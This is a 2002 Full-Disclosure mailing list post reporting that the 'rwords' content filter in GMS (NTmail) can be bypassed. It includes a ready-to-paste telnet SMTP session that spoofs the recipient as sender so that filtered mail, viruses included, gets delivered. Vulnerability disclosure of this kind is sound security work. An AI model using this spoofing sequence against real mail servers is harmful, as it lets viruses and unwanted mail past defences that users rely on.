[Full-Disclosure] Another NTmail exploit

From: Geoincidents (geoincidents@getinfo.org)
Date: 11/23/02


From: geoincidents@getinfo.org (Geoincidents)
Date: Sat, 23 Nov 2002 11:16:39 -0500

GMS (what used to be called NTmail) has a filtering feature called "rwords"
that allows you to block incoming email based on word or phrase. If you add
a phrase to the rwords list then no email with that phrase should be
delivered to your users. Likewise if you add a virus signature this feature
can be used to block email virus.

>From anywhere in the world try the following (replace rwords and the
addresses then cut and paste this into a command prompt if you like):

telnet mail.targetmailserver.com 25
helo bob
mail from:targetuser@targetmailserver.com
rcpt to:targetuser@targetmailserver.com
data
From:targetuser@targetmailserver.com
To:targetuser@targetmailserver.com
Subject:delivery test

this is a test
rwords go here
.
quit

Now go check that mailbox, rwords filtered email should not have been
delivered to it but there it is.. complete with virus or whatever else you
were trying to filter. This makes it trivial for anyone to bypass rwords
type filters. If your boss tells you to filter out emails requesting a r e
s u m e from employees then I could easily send your boss an email
requesting his.

Geo.